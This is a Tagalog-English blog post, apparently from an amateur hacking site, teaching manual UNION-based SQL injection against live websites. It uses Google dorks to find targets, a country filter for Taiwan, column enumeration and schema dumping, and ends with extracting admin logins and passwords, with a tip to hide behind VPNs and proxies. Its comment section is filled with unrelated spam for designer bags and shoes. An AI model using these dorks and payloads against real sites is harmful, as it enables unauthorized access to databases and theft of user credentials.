Hi Friends! eto ang Tutorial ng "SQLI URL BASED"One of the methods in Hacking and Cracking a Websitei called this "simple sql injection is because its so easy to bypass :3 '
SQL(Structered Query Language) Injection Tutorial:
Tools Needed:
SQLI scanner = google nalang po..
Hack Bar = Just download this on mozilla firefox add ons,
Dorks = eto gamit para maghanap ng sites na pwede i inject. :D
Fingers = for typing
VPN(virtual private network) and Proxies = di ko na to i explain, :3 i google
nalang
BRAIN
Optional Tools
Havij and other automatic tools = ang tool na to ay automatic sql injection tool, di ka na gagamit typing, just clicks..
Note: kung gusto mo gumaling sa Sql Injection, Mag start ka muna sa Manual, coz thats the key for you to become a good injector :))
Steps:
Some of the google Dorks:
There are many google dorks, about hundreds, and you can find it on google, search lang.
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:declaration_more.php?decl_id=
inurl:pageid=inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
Ok Lets Start:I search mo To sa google:inurl:index.php?id=Note: kung gusto mo ng site ng specifec na bansa o lugar just add " Site:TW " :)
ex. inurl:index.php?id= Site:TW
TW stands for taiwan kasi op taiwan daw. :3
1st. Finding vulnerable sites, 2nd. Finding amount of columns, 3rd. Getting mysql version, 4th. Getting Databases, 5th. Getting Tables, 6th Getting Columns, 7th Getting Usernames and Passwords
1. Finding vulnerable sites
Ex. eto vulnerable site ko....http://www.SAMPLESITE.com.tw/index.php?id=32
para malaman mo kung vulnerable ang site mag type ng ( ' ) sa dulo ng url
ex. http://www.SAMPLESITE.com.tw/index.php?id=32'
Pag may maglabas ng error, like
error in sql syntax .............................................................. near line 1
2. Finding Amount of Columns
Para makuha mo kung ilan ang columns, gagamitin mo ang query ma "order by #--ok,lets try order by 1-- => no error
http://www.SAMPLESITE.com.tw/index.php?id=32 order by 2-- => no error
http://www.SAMPLESITE.com.tw/index.php?id=32 order by 3-- => no error
http://www.SAMPLESITE.com.tw/index.php?id=32 order by 4-- => no error
http://www.SAMPLESITE.com.tw/index.php?id=32 order by 5-- => no error
http://www.SAMPLESITE.com.tw/index.php?id=32 order by 6-- => no error
http://www.SAMPLESITE.com.tw/index.php?id=32 order by 7-- ==>> May error na
So ibig sabihin ang columns 6 lang kasi ang error hanggang 7.. :D
ngayon hanapin na tin ang vulnerable column. To do this please folow me:
http://www.SAMPLESITE.com.tw/index.php?id=-32 union all select 1,2,3,4,5,6--
After id= please insert [-] and it means null.
ngaun may makikita kang numbers sa website, let's say ang number na nakita ko is 4 so sa column 4 ako mag iinject.
3. Getting Mysql Version
Now we wanna know the MySQL version. If its over 5 then its injectable by this Tut. (if its under 4 then you have to guess tables and columns).
http://www.SAMPLESITE.com.tw/index.php?id=-32 union all select 1,2,3,@@version,5,6--
In the vulnerable column we use @@version o version() instead of column number.ok we find it.
4. Getting Databases
Now we wanna find the databases and the Current database.Here the syntax for all databases:EX.
http://www.SAMPLESITE.com.tw/index.php?id=-32 union all select 1,2,3,group_concat(schema_name),5,6 from information_schema.schemata--
Now wel would like to now what is the current database, it's pretty obvious in this case but usefull sometimes.
Syntax for current database:
www.SAMP:ESITE/index_en.php?id=-7 union all select 1,2,3,database(),5,6 from information_schema.schemata--
okay, nahanap na..
5th Getting Tables
ngayon gusto natin malaman ang tables ng column #4, Follow me
http://www.SAMPLESITE.com.tw/index.php?id=-32 union all select 1,2,3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()--
so may makikit kang tables, hanapin ang table ng admin,Maraming tables ang admin merong, administrator, users, etc/ di ko masyado maexplain, pensa ya lang... use brain..ex. table na nandito sa akin users
6. Getting Columns,
hahanapin natin ang columns, so will use following code:
http://www.SAMPLESITE.com.tw/index.php?id=-32 union all select 1,2,3,group_concat(column_name),5,6,7,8 from information_schema.columns where table_name=CHAR(117, 115, 101, 114)--
okay, obeserve mo mabuti ang column.. diba pinalitang ang (column_name) , _schema.Columns , table_name at ung database binura at pinalitan ng mysql char ng userskasi users ang table na i dudump natin.Follow. para makuha ang sql char ng "users" sa top left ng hackber may sql. before XSs, click mo un, tapos MYSQL tapos mysql CHAR, den type mo ang string "Users" at llaalalabas to CHAR(117, 115, 101, 114).. okay? gets?
7. Dumping users/pass (getting data)
Follow this steps
Now you would like to dump logins and passwords.
http://www.SAMPLESITE.com.tw/index.php?id=-32 union all select 1,2,3,group_concat(login,0x3a,pass),5,6 from users--
so ayan na. nakuha mo na ang username at pass
ex.
admin:12345!@#$%
Lets Celebrate.. :D
Note: maramimi pang methods, techniques, at bypasses ang sqli.
examples are:
Bypassing
String basedSqli
error based
Sqli sql injection (double query eror based)
ASP :D lol
SQli double query
at ang blind sqli ang di ko pa masyado kabisado. :D
maramiing ways rin sa pag exploit at pag bypass ng website, kasi halos lahat na may vulnerablilities like
Upload vulnerabelaties
XSS
CSFG
IIS exploits etc... bla2x,stay tuned for nex TUTS.... :)
YSL's New Vintage Collection Combines Eco
TumugonBurahin?Page tools
TumugonBurahinmulberry bag mulberry bags mulberry handbag mulber
TumugonBurahinmulberry alexacheap mulberry bags mulberry bags outlet
TumugonBurahinThe very best the main custom purses tend to be, these people differentiate a person in the other people. These people display your own flavor for that high quality products. There's wide selection associated with custom totes to select from as well as every custom offers unique type of their very own. You will find large titles within purses for example Religious Dior, Fendi, Gucci as well as Ysl totes. They're really fashionable, comfy and therefore are associated with perfect high quality. Right now, allow absolutely nothing cease a person through becoming much more fashionable along with genuine custom purses.
TumugonBurahinNo subject what design you would like louboutin men; you are able to choose your Louboutin at a decreased cost to fit your budget. The expenses of shoes are a great offer lower. Christian Louboutin is the accessories brand for every super-chic fashionista. Once you see the louboutin shoes, you will be addicted to these high heels and can't stop to buy one for yourselves. The original shoes of Christian louboutin are the first class high heel in the fashion world. Right now he is the most famous shoe designer in the world. Everyone wants a pair of his creations. In the past several years, with the best after service our Christian Lounoutin Outlet has won a large number of groups of customers. If you love wearing high-heeled shoes but hate the torturous impact they have on your feet, Belstaff Blazer, then your prayers could be answered by the latest trend in shoe fashion. Dubbed 'the shoe of 2011′, platforms are a striking new addition to the footwear repertoire of the fashion-conscious. You don't know the next, you of the special place on defining the area is still in control. Your higher guidance will know what you have and what you can offer in this world, that is you and don't need special comparison with anyone else. Nothing can prevent us from when they want a piece of exclusive project. Sometimes we don't care about the money also.
TumugonBurahinShop the largest selection of mens pink nike shoes for men, women,Browse Elite, Limited, and Game Nike Uniforms, nike air max kids shoes, authentic and nike free powerlines womens, and throwback retro jerseysmens pink nike shoes at
TumugonBurahinWholesale Nike Shox TLX For Women http://is.gd/cHWJE9
A Great Investment
TumugonBurahinYves Saint Laurent Stole
TumugonBurahinYouthvlunareclipse nikere sure that you will enjoy our nike shox bb,youth cheap nike shoe with reasonableprice and best service.
TumugonBurahinWholesale The New Jordans for Women at Low Cost http://is.gd/lxuNrk
The fact is, collectors love their Saint Laurent with an unparalleled passion. "Collectors have a hard time parting with their Yves Saint Laurent pieces, but they know that I'm here," sighs Ludot. "Every day I hope to get that call, every day.
TumugonBurahinThe Hermes Birkin bag is said to be named after the British singer and actress Jane Birkin. It's said that Hermes made the bag, which was designed based on her ideas, especially for her. Jane Birkin had a chance meeting with the Hermes CEO Jean-louis Dumas back in the early eighties. And through that fateful meeting, the now world-class Hermes Birkin bag was originated. The very first prototype was sent directly to Jane Birkin herself, and the rest is history.
TumugonBurahinOf the advert Dahl has said: "I think the photograph is beautiful. it was seen as being anti-women, when in fact I think it is very empowering to women."
TumugonBurahin